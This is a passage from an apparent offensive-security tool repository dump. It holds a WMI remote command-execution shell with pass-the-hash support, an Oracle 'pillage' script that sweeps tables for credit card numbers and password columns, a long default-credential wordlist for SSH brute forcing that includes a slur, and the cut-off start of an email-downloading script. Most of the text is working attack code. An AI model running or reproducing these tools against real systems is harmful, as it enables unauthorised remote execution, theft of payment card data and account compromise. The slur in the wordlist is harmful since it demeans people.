Something went wrong 147 | print self.__outputBuffer 148 | self.__outputBuffer = '' 149 | else: 150 | # Drive valid, now we should get the current path 151 | self.__pwd = line 152 | self.execute_remote('cd ') 153 | self.__pwd = self.__outputBuffer.strip('\r\n') 154 | self.prompt = self.__pwd + '>' 155 | self.__outputBuffer = '' 156 | else: 157 | if line != '': 158 | self.send_data(line) 159 | 160 | def get_output(self): 161 | def output_callback(data): 162 | self.__outputBuffer += data 163 | 164 | if self.__noOutput is True: 165 | self.__outputBuffer = '' 166 | return 167 | 168 | while True: 169 | try: 170 | self.__transferClient.getFile(self.__share, self.__output, output_callback) 171 | break 172 | except Exception, e: 173 | if str(e).find('STATUS_SHARING_VIOLATION') >= 0: 174 | # Output not finished, let's wait 175 | time.sleep(1) 176 | pass 177 | else: 178 | #print str(e) 179 | pass 180 | self.__transferClient.deleteFile(self.__share, self.__output) 181 | 182 | def execute_remote(self, data): 183 | command = self.__shell + data 184 | if self.__noOutput is False: 185 | command += ' 1> ' + '\\\\127.0.0.1\\%s' % self.__share + self.__output + ' 2>&1' 186 | obj = self.__win32Process.Create(command, self.__pwd, None) 187 | self.get_output() 188 | 189 | def send_data(self, data): 190 | self.execute_remote(data) 191 | print self.__outputBuffer 192 | self.__outputBuffer = '' 193 | 194 | 195 | # Process command-line arguments. 196 | if __name__ == '__main__': 197 | print version.BANNER 198 | 199 | parser = argparse.ArgumentParser() 200 | 201 | #parser.add_argument('target', action='store', help='[domain/][username[:password]@]
') 202 | parser.add_argument('-d', action='store', help='[domain]') 203 | parser.add_argument('-u', action='store', help='[username]') 204 | parser.add_argument('-p', action='store', help='[password]') 205 | parser.add_argument('-ip', action='store', help='[ip address]') 206 | parser.add_argument('-f', action='store', help='[file containg list of IP addresses]') 207 | parser.add_argument('-share', action='store', default='ADMIN$', help='share where the output will be grabbed from (default ADMIN$)') 208 | parser.add_argument('-nooutput', action='store_true', default=False, help='whether or not to print the output (no SMB connection created)') 209 | 210 | parser.add_argument('-command', action='store', help='command to execute at the target. If empty it will launch a semi-interactive shell') 211 | #parser.add_argument('command', nargs='*', default = ' ', help='command to execute at the target. If empty it will launch a semi-interactive shell') 212 | 213 | group = parser.add_argument_group('authentication') 214 | 215 | group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') 216 | 217 | if len(sys.argv) == 1: 218 | parser.print_help() 219 | sys.exit(1) 220 | 221 | options = parser.parse_args() 222 | 223 | if options.command == ' ' and options.nooutput is True: 224 | print "[-] Error: -nooutput switch and interactive shell not supported" 225 | sys.exit(1) 226 | 227 | addList = [] 228 | 229 | if options.f: 230 | inp = open(options.f, "r") 231 | for line in inp.readlines(): 232 | addList.append(line.rstrip()) 233 | for address in addList: 234 | print "[*] Running command on %s..." % address 235 | username = options.u 236 | password = options.p 237 | try: 238 | if options.d is None: 239 | domain = '' 240 | else: 241 | domain = options.d 242 | if password == '' and username != '' and options.hashes is None: 243 | from getpass import getpass 244 | password = getpass("Password:") 245 | 246 | executer = WMIEXEC(options.command, username, password, domain, options.hashes, options.share, options.nooutput) 247 | executer.run(address) 248 | except (Exception, KeyboardInterrupt) as e: 249 | #import traceback 250 | #print traceback.print_exc() 251 | print '\n[-] Error: %s' % e 252 | sys.exit(0) 253 | 254 | else: 255 | username = options.u 256 | password = options.p 257 | address = options.ip 258 | try: 259 | if options.d is None: 260 | domain = '' 261 | else: 262 | domain = options.d 263 | if password == '' and username != '' and options.hashes is None: 264 | from getpass import getpass 265 | password = getpass("Password:") 266 | 267 | executer = WMIEXEC(options.command, username, password, domain, options.hashes, options.share, options.nooutput) 268 | executer.run(address) 269 | except (Exception, KeyboardInterrupt) as e: 270 | #import traceback 271 | #print traceback.print_exc() 272 | print '\n[-] Error: %s' % e 273 | sys.exit(0) 274 | -------------------------------------------------------------------------------- /oracle_pillage/ora_pillage.py: -------------------------------------------------------------------------------- 1 | import cx_Oracle 2 | import time 3 | import sys 4 | import csv 5 | import re 6 | import argparse 7 | import urllib 8 | import os.path 9 | import fileinput 10 | import subprocess 11 | import socket 12 | import os 13 | import itertools 14 | from collections import defaultdict 15 | from pprint import pprint 16 | from termcolor import colored 17 | 18 | #http://hivelocity.dl.sourceforge.net/project/cx-oracle/5.1.1/cx_Oracle-5.1.1.tar.gz 19 | outputFileCSV="" 20 | ccRegex = [] 21 | ccRegex.append("^4[0-9]{12}(?:[0-9]{3})?$") #Visa Regex 22 | ccRegex.append("^5[1-5][0-9]{14}$") #Mastercard Regex 23 | ccRegex.append("^3[47][0-9]{13}$") #Amex Regex 24 | ccRegex.append("^3(?:0[0-5]|[68][0-9])[0-9]{11}$") #Diners Regex 25 | ccRegex.append("^6(?:011|5[0-9]{2})[0-9]{12}$") #Discover Regex 26 | ccRegex.append("^(?:2131|1800|35\d{3})\d{11}$") #JCDB Regex 27 | 28 | interestingData = False 29 | 30 | def cardLuhnChecksumIsValid(card_number): 31 | """ checks to make sure that the card passes a luhn mod-10 checksum """ 32 | 33 | sum = 0 34 | num_digits = len(card_number) 35 | oddeven = num_digits & 1 36 | 37 | for count in range(0, num_digits): 38 | digit = int(card_number[count]) 39 | 40 | if not (( count & 1 ) ^ oddeven ): 41 | digit = digit * 2 42 | if digit > 9: 43 | digit = digit - 9 44 | 45 | sum = sum + digit 46 | return ( (sum % 10) == 0 ) 47 | 48 | def dataExtract(username,password,hostname,sid,sample): 49 | print "[+] Extracting data from database" 50 | try: 51 | orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 52 | curs = orcl1.cursor() 53 | curs.execute("select * from v$database") 54 | for db_data in curs: 55 | #Iterate per database 56 | dbName = db_data[1] 57 | print "[+] Database found: "+dbName 58 | 59 | orcl2 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 60 | curs2 = orcl2.cursor() 61 | tblCount2 = curs2.execute("SELECT COUNT(*) FROM tab") 62 | #Get a count of the total tables in the databases 63 | if tblCount2<1: 64 | print "There are no tables in "+dbName+". Its possible that the account does not have access. Try escalating privileges." 65 | if tblCount2: 66 | #Continue with CC data search 67 | orcl3 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 68 | curs3 = orcl3.cursor() 69 | curs3.execute("SELECT * FROM tab") #Get a list of all tables 70 | for row_data in curs3: 71 | #Iterate per table 72 | if not row_data[0].startswith('BIN$'): # skip recycle bin tables 73 | tableName = row_data[0] 74 | try: 75 | print colored("\n[+] Ransacking table: "+tableName+" in "+sid,"red",attrs=['bold']) 76 | orcl4 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 77 | sql4 = "select * from (select * from " + tableName+") where rownum <="+str(sample) 78 | curs4 = orcl4.cursor() 79 | curs4.execute(sql4) 80 | matchedRows = [] 81 | results = curs4.fetchall() 82 | except cx_Oracle.DatabaseError: 83 | continue 84 | except cx_Oracle.DatabaseError: 85 | continue 86 | 87 | global outputFileCSV 88 | if outputFileCSV!="": 89 | for result in results: 90 | print str(result) 91 | #Write all results to output file 92 | fo = open(outputFileCSV, "a+") 93 | fo.write(str(result)+"\n") 94 | fo.close() 95 | else: 96 | for result in results: 97 | print result 98 | results = curs4.fetchall() 99 | for searchStr in ccRegex: 100 | #Credit Card Regex Search 101 | p = re.compile(searchStr) 102 | for row_data in results: 103 | for col in row_data: 104 | if p.match(str(col)): 105 | #Run the found CC info thru LUHN algorithm to confirm 106 | n = p.match(str(col)) 107 | if cardLuhnChecksumIsValid(str(col)): 108 | print colored("[+] Found valid CC: %s in table %s [%s]" % (col, tableName, sid),"red",attrs=['bold']) 109 | else: 110 | print "%s is not valid credit card number" % col 111 | matchedRows.append(row_data) 112 | #Write rows that matched to csv file 113 | if len(matchedRows) > 0: 114 | csv_file_dest = dbName + '_' + tableName + ".csv" 115 | print colored("\n[+] Results for first ten rows have been saved to "+csv_file_dest+".","red",attrs=['bold']) 116 | outputFile = open(csv_file_dest,'w') 117 | output = csv.writer(outputFile, dialect='excel') 118 | 119 | #if printHeader: # add column headers if requested 120 | cols = [] 121 | for col in curs4.description: 122 | cols.append(col[0]) 123 | output.writerow(cols) 124 | 125 | for rows in matchedRows: # add table rows 126 | output.writerow(rows) 127 | outputFile.close() 128 | curs4.close() 129 | curs3.close() 130 | curs2.close() 131 | curs.close() 132 | 133 | except cx_Oracle.DatabaseError as e: 134 | print e 135 | tableNames = [] 136 | if "table or view does not exist" in str(e): 137 | print colored("\n[!] Account is not a DBA. Please try to use 'ora_priv.py'.","blue",attrs=['bold']) 138 | orcl2 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 139 | curs2 = orcl2.cursor() 140 | curs2.execute("SELECT table_name FROM user_tables") 141 | #curs2.execute("SELECT table_name FROM all_tab_columns WHERE column_name LIKE \'%%\'") 142 | for row_data in curs2: 143 | #Iterate per table 144 | if not row_data[0].startswith('BIN$'): # skip recycle bin tables 145 | tableName = row_data[0] 146 | if tableName not in tableNames: 147 | tableNames.append(tableName) 148 | for tableName in tableNames: 149 | print str(tableName) 150 | try: 151 | print colored("\n[+] Ransacking table: "+tableName+" in "+sid,"red",attrs=['bold']) 152 | orcl4 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 153 | sql4 = "SELECT column_name FROM USER_TAB_COLUMNS WHERE table_name = '"+str(tableName)+"'" 154 | curs4 = orcl4.cursor() 155 | curs4.execute(sql4) 156 | matchedRows = [] 157 | results = curs4.fetchall() 158 | #print str(results) 159 | newResults = str(results).lower() 160 | global interestingData 161 | if interestingData == True: 162 | if "card" in newResults or "credit" in newResults or "bank" in newResults or "passw" in newResults: 163 | print str(results) 164 | orcl5 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 165 | sql5 = "select * from (select * from " + tableName+") where rownum <="+str(sample) 166 | curs5 = orcl4.cursor() 167 | curs5.execute(sql5) 168 | matchedRows = [] 169 | results = curs5.fetchall() 170 | for result in results: 171 | print str(result) 172 | else: 173 | print str(results) 174 | orcl5 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 175 | sql5 = "select * from (select * from " + tableName+") where rownum <="+str(sample) 176 | curs5 = orcl4.cursor() 177 | curs5.execute(sql5) 178 | matchedRows = [] 179 | results = curs5.fetchall() 180 | for result in results: 181 | print str(result) 182 | 183 | except cx_Oracle.DatabaseError as e: 184 | if "table or view does not exist" in str(e): 185 | pass 186 | #for result in results: 187 | # print str(result) 188 | # print "cx_Oracle.DatabaseError" 189 | # pass 190 | 191 | 192 | #outputFileCSV="output4.csv" 193 | interestingData=False 194 | 195 | if __name__=="__main__": 196 | parser = argparse.ArgumentParser(description='Oracle Privilege Escalation') 197 | parser.add_argument('-host', help='IP or host name of Oracle server') 198 | parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers') 199 | parser.add_argument('-u', dest='username', help='Use this username to authenticate') 200 | parser.add_argument('-p', dest='password', help='Use this password to authenticate') 201 | parser.add_argument('-sid', dest='sid', help='Use this sid') 202 | parser.add_argument('-sample', dest='sample', help='Sample size') 203 | parser.add_argument('-idf', action='store_true', help='Interesting Data Finder') 204 | args = vars(parser.parse_args()) 205 | 206 | hostList = [] 207 | counter=0 208 | 209 | if args['host']!=None: 210 | counter+=1 211 | 212 | if args['hostFile']!=None: 213 | counter+=1 214 | 215 | if args['hostFile']!=None and args['host']==None: 216 | for line in open(args['hostFile'],'r'): 217 | hostList.append(line.strip()) 218 | 219 | if args['host']!=None and args['hostFile']==None: 220 | hostList.append(args['host']) 221 | 222 | if counter==0 or counter>1: 223 | print colored("[+] Please use either -host or -hostFile.","red",attrs=['bold']) 224 | sys.exit(0) 225 | 226 | if args['sid']!=None: 227 | sid = args['sid'] 228 | 229 | if args['sample']!=None: 230 | sample = args['sample'] 231 | 232 | if args['idf']: 233 | interestingData=True 234 | 235 | #Check if username/password is provided in the command line 236 | credCount=0 237 | 238 | if args['username']!=None: 239 | credCount+=1 240 | if args['password']!=None: 241 | credCount+=1 242 | if credCount>1 and credCount<2: 243 | print "[!] You need to provide both -u and -p." 244 | sys.exit(0) 245 | 246 | #Load hostname 247 | for hostname in hostList: 248 | if len(hostname)<1: 249 | sys.exit(0) 250 | 251 | socketAvail = False 252 | try: 253 | socket.setdefaulttimeout(2) 254 | s = socket.socket() 255 | s.connect((hostname,1521)) 256 | socketAvail=True 257 | print "[+] Connected to "+hostname+":1521" 258 | except: 259 | print "[-] Cannot connect to "+hostname+":1521" 260 | 261 | if socketAvail==True: 262 | username = args['username'] 263 | password = args['password'] 264 | print "[+] [SID:"+sid+"] Testing accounts. " 265 | if args['sample']==None: 266 | sample=5 267 | dataExtract(username,password,hostname,sid,sample) 268 | -------------------------------------------------------------------------------- /default_accounts_wordlist/wordList_ssh.txt: -------------------------------------------------------------------------------- 1 | :n/a:admin 2 | :n/a:(none) 3 | :l2:l2 4 | :l3:l3 5 | :ro:ro 6 | :rw:rw 7 | :rwa:rwa 8 | :sa:(none) 9 | :sa:sasasa 10 | :sysadmin:master 11 | :sysadm:sysadm 12 | :guest:(none) 13 | :nop:12345 14 | :admin:(none) 15 | :autocad:autocad 16 | :(any 3 characters):cascade 17 | :Administrator:changeme 18 | :Admin:No 19 | :admin:bintec 20 | :config:biodata 21 | :root:last 6 characters of the MAC ADRESS "if it contains any alpha characters, type them as upper case" 22 | :root:Last 6 characters (chars uppercased) from MAC Address 23 | :(none):admin 24 | :diag:danger 25 | :manuf:xxyyzz 26 | :N/A:AUTORAID 27 | :Admin:admin1 28 | :Administrator:admin 29 | :memotec:supervisor 30 | :1:syslib 31 | :1:operator 32 | :1:manager 33 | :2:maintain 34 | :2:syslib 35 | :2:manager 36 | :2:operator 37 | :30:games 38 | :5:games 39 | :7:maintain 40 | :operator:admin 41 | :n/a:ACCESS 42 | :n/a:SYSTEM 43 | :craft:(none) 44 | :admin:none 45 | :admin:year2000 46 | :admin:____BLANK___ 47 | :m1122:m1122 48 | :SETUP:(none) 49 | :LIBRARY:(none) 50 | :james:james 51 | :NICONEX:NICONEX 52 | :(none):enter 53 | :file:file 54 | :admin:abc123 55 | :ami:(none) 56 | :mountsys:mountsys 57 | :news:news 58 | :news:(none) 59 | :nobody:(none) 60 | :nobody:nobody 61 | :nuucp:(none) 62 | :operator:(none) 63 | :oracle:(none) 64 | :postmaster:postmast 65 | :postmaster:(none) 66 | :powerdown:powerdown 67 | :rje:rje 68 | :root:(none) 69 | :shutdown:shutdown 70 | :shutdown:(none) 71 | :sync:sync 72 | :sync:(none) 73 | :sys:system 74 | :sys:bin 75 | :sysadm:admin 76 | :sysadmin:sysadmin 77 | :sysbin:sysbin 78 | :system_admin:(none) 79 | :checkfsys:checkfsys 80 | :checksys:checksys 81 | :daemon:daemon 82 | :daemon:(none) 83 | :demo:(none) 84 | :demos:demos 85 | :demos:(none) 86 | :dni:(none) 87 | :dni:dni 88 | :fal:(none) 89 | :fal:fal 90 | :fax:(none) 91 | :fax:fax 92 | :ftp:(none) 93 | :ftp:ftp 94 | :games:games 95 | :games:(none) 96 | :gopher:gopher 97 | :gropher:(none) 98 | :guest:guestgue 99 | :halt:halt 100 | :halt:(none) 101 | :root:hp 102 | :install:install 103 | :lp:lp 104 | :lp:bin 105 | :lp:lineprin 106 | :lp:(none) 107 | :lpadm:lpadm 108 | :lpadmin:lpadmin 109 | :lynx:lynx 110 | :lynx:(none) 111 | :mail:(none) 112 | :mail:mail 113 | :man:man 114 | :man:(none) 115 | :me:(none) 116 | :me:me 117 | :mountfs:mountfs 118 | :mountfsys:mountfsys 119 | :system_admin:system_admin 120 | :trouble:trouble 121 | :umountfs:umountfs 122 | :umountfsys:umountfsys 123 | :umountsys:umountsys 124 | :unix:unix 125 | :uucp:uucp 126 | :uucpadm:uucpadm 127 | :web:(none) 128 | :web:web 129 | :webmaster:webmaster 130 | :webmaster:(none) 131 | :www:(none) 132 | :www:www 133 | :adm:adm 134 | :adm:(none) 135 | :administrator:(none) 136 | :anon:anon 137 | :bbs:bbs 138 | :bbs:(none) 139 | :bin:sys 140 | :checkfs:checkfs 141 | :Admin:atc456 142 | :LessonUser1:(none) 143 | :LessonUser2:(none) 144 | :(none):speedxess 145 | :drhhdrhhd:dhrhdhhhh 146 | :31994:31994 147 | :n/a:access 148 | :MGR:TELESUP 149 | :MGR:HPDESK 150 | :MGR:CCC 151 | :MGR:CNAS 152 | :MGR:WORD 153 | :MGR:COGNOS 154 | :MGR:ROBELLE 155 | :MGR:HPOFFICE 156 | :MGR:HPONLY 157 | :MGR:HPP187 158 | :MGR:HPP189 159 | :MGR:HPP196 160 | :MGR:INTX3 161 | :MGR:ITF3000 162 | :MGR:NETBASE 163 | :MGR:REGO 164 | :MGR:RJE 165 | :MGR:CONV 166 | :OPERATOR:SYS 167 | :OPERATOR:DISC 168 | :OPERATOR:SYSTEM 169 | :OPERATOR:SUPPORT 170 | :OPERATOR:COGNOS 171 | :PCUSER:SYS 172 | :RSBCMON:SYS 173 | :SPOOLMAN:HPOFFICE 174 | :WP:HPOFFICE 175 | :ADVMAIL:HPOFFICE DATA 176 | :ADVMAIL:HP 177 | :FIELD:SUPPORT 178 | :FIELD:MGR 179 | :FIELD:SERVICE 180 | :FIELD:MANAGER 181 | :FIELD:HPP187 SYS 182 | :FIELD:LOTUS 183 | :FIELD:HPWORD PUB 184 | :FIELD:HPONLY 185 | :HELLO:MANAGER.SYS 186 | :HELLO:MGR.SYS 187 | :HELLO:FIELD.SUPPORT 188 | :HELLO:OP.OPERATOR 189 | :MAIL:MAIL 190 | :MAIL:REMOTE 191 | :MAIL:TELESUP 192 | :MAIL:HPOFFICE 193 | :MAIL:MPE 194 | :MANAGER:TCH 195 | :MANAGER:SYS 196 | :MANAGER:SECURITY 197 | :MANAGER:ITF3000 198 | :MANAGER:HPOFFICE 199 | :MANAGER:COGNOS 200 | :MANAGER:TELESUP 201 | :MGE:VESOFT 202 | :MGR:SYS 203 | :MGR:CAROLIAN 204 | :MGR:VESOFT 205 | :MGR:XLSERVER 206 | :MGR:SECURITY 207 | :admin:rainbow 208 | :admin:hello 209 | :khan:kahn 210 | :SYSDBA:masterkey 211 | :IntraStack:Asante 212 | :IntraSwitch:Asante 213 | :cisco:cisco 214 | :n/a:c 215 | :n/a:cisco 216 | :n/a:Cisco router 217 | :n/a:cc 218 | :enable:cisco 219 | :accounting:accounting 220 | :boss:boss 221 | :manager:manager 222 | :PDP11:PDP11 223 | :PDP8:PDP8 224 | :software:software 225 | :tutor:(none) 226 | :tutor:tutor 227 | :4Dgifts:4Dgifts 228 | :4Dgifts:(none) 229 | :Ezsetup:(none) 230 | :tour:tour 231 | :OutOfBox:(none) 232 | :n/a:1RRWTTOOI 233 | :1234567890:bloggs 234 | :Sysop:Sysop 235 | :admin:Ascend 236 | :SYSADM:sysadm 237 | :MCVEADMIN:password 238 | :(none):help 239 | :mediator:mediator 240 | :root:Mau dib 241 | :disttech:4tas 242 | :maint:maint 243 | :ccrusr:ccrusr 244 | :mlusr:mlusr 245 | :root:3ep5w2u 246 | :maint:ntacdmax 247 | :intelligent_guy_priyank:passwordguy 248 | :handsome_123_handsome:plsdontguess 249 | :MICRO:RSX 250 | :Admin:admin 251 | :admin:2222 252 | :ncrm:ncrm 253 | :admin:tetra 254 | :(none):(none) 255 | :netrangr:attack 256 | :LASERWRITER:(none) 257 | :MAIL:(none) 258 | :POST:(none) 259 | :POST:POST 260 | :PRINT:(none) 261 | :PRINT:PRINT 262 | :PRINTER:(none) 263 | :PRINTER:PRINTER 264 | :ROOT:(none) 265 | :ROOT:ROOT 266 | :ROUTER:(none) 267 | :SABRE:(none) 268 | :SUPERVISOR:NETFRAME 269 | :SUPERVISOR:NFI 270 | :SUPERVISOR:NF 271 | :SUPERVISOR:HARRIS 272 | :SUPERVISOR:SUPERVISOR 273 | :SUPERVISOR:(none) 274 | :SUPERVISOR:SYSTEM 275 | :TEST:TEST 276 | :TEST:(none) 277 | :USER_TEMPLATE:(none) 278 | :USER_TEMPLATE:USER_TEMPLATE 279 | :WANGTEK:(none) 280 | :WANGTEK:WANGTEK 281 | :WINDOWS_PASSTHRU:WINDOWS_PASSTHRU 282 | :WINDOWS_PASSTHRU:(none) 283 | :WINSABRE:SABRE 284 | :WINSABRE:WINSABRE 285 | :ADMIN:ADMIN 286 | :ADMIN:(none) 287 | :BACKUP:BACKUP 288 | :CHEY_ARCHSVR:CHEY_ARCHSVR 289 | :CHEY_ARCHSVR:(none) 290 | :FAX:FAX 291 | :FAX:(none) 292 | :FAXUSER:FAXUSER 293 | :FAXUSER:(none) 294 | :FAXWORKS:(none) 295 | :FAXWORKS:FAXWORKS 296 | :GATEWAY:GATEWAY 297 | :GATEWAY:(none) 298 | :GUEST:TSEUG 299 | :GUEST:GUESTGUEST 300 | :GUEST:GUESTGUE 301 | :GUEST:GUEST 302 | :GUEST:(none) 303 | :HPLASER:(none) 304 | :HPLASER:HPLASER 305 | :LASER:(none) 306 | :BACKUP:(none) 307 | :ARCHIVIST:ARCHIVIST 308 | :LASER:LASER 309 | :LASERWRITER:LASERWRITER 310 | :ARCHIVIST:(none) 311 | :admin:my_DEMARC 312 | :signa:signa 313 | :root:NeXT 314 | :root:nokia 315 | :n/a:symantec 316 | :n/a:1064 317 | :adminttd:adminttd 318 | :ftp_admi:kilo1987 319 | :n/a:123456 320 | :SYSMAN:oem_temp 321 | :CTXSYS:(none) 322 | :DEMO:DEMO 323 | :MTYSYS:MTYSYS 324 | :SCOTT:TIGER 325 | :SYS:CHANGE_ON_INSTALL 326 | :SYSTEM:MANAGER 327 | :TRACESRV:TRACE 328 | :APPLSYS:APPLSYS 329 | :AURORA@ORB@UNAUTHENTICATED:INVALID 330 | :11111111:11111111 331 | :22222222:22222222 332 | :ibm:password 333 | :ibm:2222 334 | :ibm:service 335 | :qpgmr:qpgmr 336 | :qsecofr:qsecofr 337 | :qsecofr:11111111 338 | :qsecofr:22222222 339 | :qserv:qserv 340 | :qsrv:qsrv 341 | :qsrvbas:qsrvbas 342 | :qsvr:qsvr 343 | :qsvr:ibmcel 344 | :qsysopr:qsysopr 345 | :quser:quser 346 | :secofr:secofr 347 | :patrol:patrol 348 | :PO8:PO8 349 | :tech:field 350 | :SUPERVISOR:DISCAR 351 | :supervisor:supervisor 352 | :primos_cs:primos 353 | :guest1:guest1 354 | :primos_cs:prime 355 | :system:prime 356 | :system:system 357 | :tele:tele 358 | :prime:prime 359 | :primenet:primenet 360 | :primenet:primeos 361 | :netlink:netlink 362 | :mfd:mfd 363 | :guest1:guest 364 | :root:ascend 365 | :readwrite:lucenttech1 366 | :readonly:lucenttech2 367 | :admin:rmnetlm 368 | :admin2:changeme 369 | :adminstrator:changeme 370 | :deskalt:password 371 | :deskman:changeme 372 | :desknorm:password 373 | :deskres:password 374 | :replicator:replicator 375 | :RMUser1:password 376 | :topicalt:password 377 | :topicnorm:password 378 | :topicres:password 379 | :setup:changeme 380 | :teacher:password 381 | :temp1:password 382 | :1.1:SYSTEM 383 | :BATCH:BATCH 384 | :SYSTEM:SYSTEM 385 | :admin:private 386 | :ADMN:admn 387 | :GEN1:gen1 388 | :GEN2:gen2 389 | :Guest:(none) 390 | :gonzo:(none) 391 | :snake:(none) 392 | :satan:(none) 393 | :sa:(blank) 394 | ::sa 395 | :stuccoboy:100198 396 | :fucking:javascript faggots 397 | :DBA:SQL 398 | :bciim:bciimpw 399 | :bcim:bcimpw 400 | :bcms:bcmspw 401 | :bcnas:bcnaspw 402 | :blue:bluepw 403 | :browse:browsepw 404 | :browse:looker 405 | :craft:craft 406 | :craft:craftpw 407 | :cust:custpw 408 | :enquiry:enquirypw 409 | :field:support 410 | :inads:indspw 411 | :inads:inads 412 | :init:initpw 413 | :locate:locatepw 414 | :maint:maintpw 415 | :maint:rwmaint 416 | :nms:nmspw 417 | :rcust:rcustpw 418 | :support:supportpw 419 | ::use ALT+G at boot to reset config 420 | :(none):744 421 | :secoff:secoff 422 | :tellabs:tellabs#1 423 | :storwatch:specialist 424 | :Administrator:ganteng 425 | :managers:managers 426 | :root:uClinux 427 | :Any:12345 428 | :admin:utstar 429 | :n/a:SY_MB 430 | :n/a:system 431 | :OP1:(none) 432 | :OPERATNS:(none) 433 | :OPERATOR:(none) 434 | :PDMREMI:(none) 435 | :PENG:(none) 436 | :PROCAL:(none) 437 | :PRODBM:(none) 438 | :PROMAIL:(none) 439 | :PSFMAINT:(none) 440 | :PVM:(none) 441 | :RDM470:(none) 442 | :RSCS:(none) 443 | :RSCSV2:(none) 444 | :SAVSYS:(none) 445 | :SFCMI:(none) 446 | :SFCNTRL:(none) 447 | :SMART:(none) 448 | :SQLDBA:(none) 449 | :SQLUSER:(none) 450 | :SYSADMIN:(none) 451 | :SYSCKP:(none) 452 | :SYSDUMP1:(none) 453 | :SYSERR:(none) 454 | :SYSWRM:(none) 455 | :TDISK:(none) 456 | :TEMP:(none) 457 | :TSAFVM:(none) 458 | :VASTEST:(none) 459 | :VM3812:(none) 460 | :VMARCH:(none) 461 | :VMASMON:(none) 462 | :VMASSYS:(none) 463 | :VMBACKUP:(none) 464 | :VMBSYSAD:(none) 465 | :VMMAP:(none) 466 | :VMTAPE:(none) 467 | :VMTLIBR:(none) 468 | :VMUTIL:(none) 469 | :VSEIPO:(none) 470 | :VSEMAINT:(none) 471 | :VSEMAN:(none) 472 | :VTAM:(none) 473 | :VTAMUSER:(none) 474 | :DEMO4:(none) 475 | :$ALOC$:(none) 476 | :AP2SVP:(none) 477 | :APL2PP:(none) 478 | :AUTOLOG1:(none) 479 | :BATCH:(none) 480 | :BATCH1:(none) 481 | :BATCH2:(none) 482 | :CCC:(none) 483 | :CMSBATCH:(none) 484 | :CMSUSER:(none) 485 | :CPNUC:(none) 486 | :CPRM:(none) 487 | :CSPUSER:(none) 488 | :CVIEW:(none) 489 | :DATAMOVE:(none) 490 | :DEMO1:(none) 491 | :DEMO3:(none) 492 | :DEMO2:(none) 493 | :DIRECT:(none) 494 | :DIRMAINT:(none) 495 | :DISKCNT:(none) 496 | :EREP:(none) 497 | :FSFADMIN:(none) 498 | :FSFTASK1:(none) 499 | :FSFTASK2:(none) 500 | :GCS:(none) 501 | :IDMS:(none) 502 | :IDMSSE:(none) 503 | :IIPS:(none) 504 | :IPFSERV:(none) 505 | :ISPVM:(none) 506 | :IVPM1:(none) 507 | :IVPM2:(none) 508 | :MAINT:(none) 509 | :MOESERV:(none) 510 | :NEVIEW:(none) 511 | :OLTSEP:(none) 512 | :TELEDEMO:TELEDEMO 513 | :UETP:UETP 514 | :USER:PASSWORD 515 | :USERP:USERP 516 | :VAX:VAX 517 | :VMS:VMS 518 | :ALLIN1:ALLIN1 519 | :ALLIN1MAIL:ALLIN1MAIL 520 | :ALLINONE:ALLINONE 521 | :DCL:DCL 522 | :DECMAIL:DECMAIL 523 | :DECNET:DECNET 524 | :DECNET:NONPRIV 525 | :PRIV:PRIV 526 | :REPORT:REPORT 527 | :RJE:RJE 528 | :STUDENT:STUDENT 529 | :SYS:SYS 530 | :SYSMAINT:SYSMAINT 531 | :SYSMAINT:SERVICE 532 | :SYSMAINT:DIGITAL 533 | :SYSTEM:OPERATOR 534 | :SYSTEM:SYSLIB 535 | :SYSTEST:UETP 536 | :DEFAULT:USER 537 | :SYSTEST_CLIG:SYSTEST_CLIG 538 | :DEFAULT:DEFAULT 539 | :FIELD:FIELD 540 | :FIELD:TEST 541 | :FIELD:DIGITAL 542 | :HELP:HELP 543 | :HELPDESK:HELPDESK 544 | :HOST:HOST 545 | :INFO:INFO 546 | :INGRES:INGRES 547 | :LINK:LINK 548 | :MAILER:MAILER 549 | :MBMANAGER:MBMANAGER 550 | :MBWATCH:MBWATCH 551 | :NETCON:NETCON 552 | :NETMGR:NETMGR 553 | :NETNONPRIV:NETNONPRIV 554 | :SYSTEST_CLIG:SYSTEST 555 | :NETPRIV:NETPRIV 556 | :NETSERVER:NETSERVER 557 | :NEWINGRES:NEWINGRES 558 | :NEWS:NEWS 559 | :OPERVAX:OPERVAX 560 | :POSTMASTER:POSTMASTER 561 | :(none):default 562 | :Administrator:(none) 563 | :User:User 564 | :Guest:Guest 565 | :IS_$hostname:(same) 566 | :Administrator:Administrator 567 | :admin:comcomcom 568 | :(none):Intel 569 | :sherzad420:pakistan 570 | -------------------------------------------------------------------------------- /emaildownloader/emailDownloader.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import email,os,imaplib 5 | from imapclient import IMAPClient 6 | from email.utils import parseaddr 7 | import socket,sys,time 8 | import multiprocessing 9 | import getpass, poplib 10 | import socket 11 | 12 | imapserver = '' 13 | popserver = '' 14 | verbose=False 15 | SSL=True 16 | SEARCH=False 17 | USERNAME = '' 18 | PASSWORD = '' 19 | INPUTFILE = '' 20 | emails_dir = os.getcwd()+"/result/" 21 | 22 | 23 | def isOpen(ip,port): 24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | try: 26 | s.settimeout(1) 27 | s.connect((ip, int(port))) 28 | s.close() 29 | return True 30 | except: 31 | return False 32 | 33 | def fetch_email(server,msgid,username): 34 | if not os.path.exists(emails_dir+"attachments/"+username): 35 | os.makedirs(emails_dir+"attachments/"+username) 36 | 37 | response = server.fetch(msgid, ['RFC822']) 38 | for msgid, data in response.iteritems(): 39 | msg_string = data['RFC822'] 40 | msg = email.message_from_string(msg_string) 41 | if msg.get_content_maintype() == 'multipart': 42 | for part in msg.walk(): 43 | filename = part.get_filename() 44 | if filename: 45 | msgbody = (part.get_payload(decode=True)) 46 | if msgbody!=None: 47 | att_path = os.path.join(emails_dir+"attachments/"+username+"/", filename) 48 | if not 